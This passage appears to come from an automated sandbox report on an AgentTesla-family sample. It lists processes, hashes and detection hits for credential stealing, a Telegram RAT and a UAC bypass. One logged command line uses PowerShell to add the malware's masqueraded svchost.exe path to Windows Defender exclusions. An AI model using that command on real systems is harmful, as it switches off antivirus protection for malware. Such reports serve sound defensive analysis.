                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              Analysis Process: svchost.exe PID: 4876 Parent PID: 3424

                              General

                              Start time:05:32:54
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xbf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 19%, ReversingLabs

                              Analysis Process: svchost.exe PID: 1004 Parent PID: 568

                              General

                              Start time:05:32:56
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: powershell.exe PID: 6008 Parent PID: 4876

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Analysis Process: conhost.exe PID: 612 Parent PID: 6008

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Analysis Process: svchost.exe PID: 6712 Parent PID: 3424

                              General

                              Start time:05:33:03
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xfb0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security

                              Analysis Process: aspnet_regbrowsers.exe PID: 4588 Parent PID: 4876

                              General

                              Start time:05:33:09
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xbe0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              Disassembly

                              Code Analysis

                              Reset < >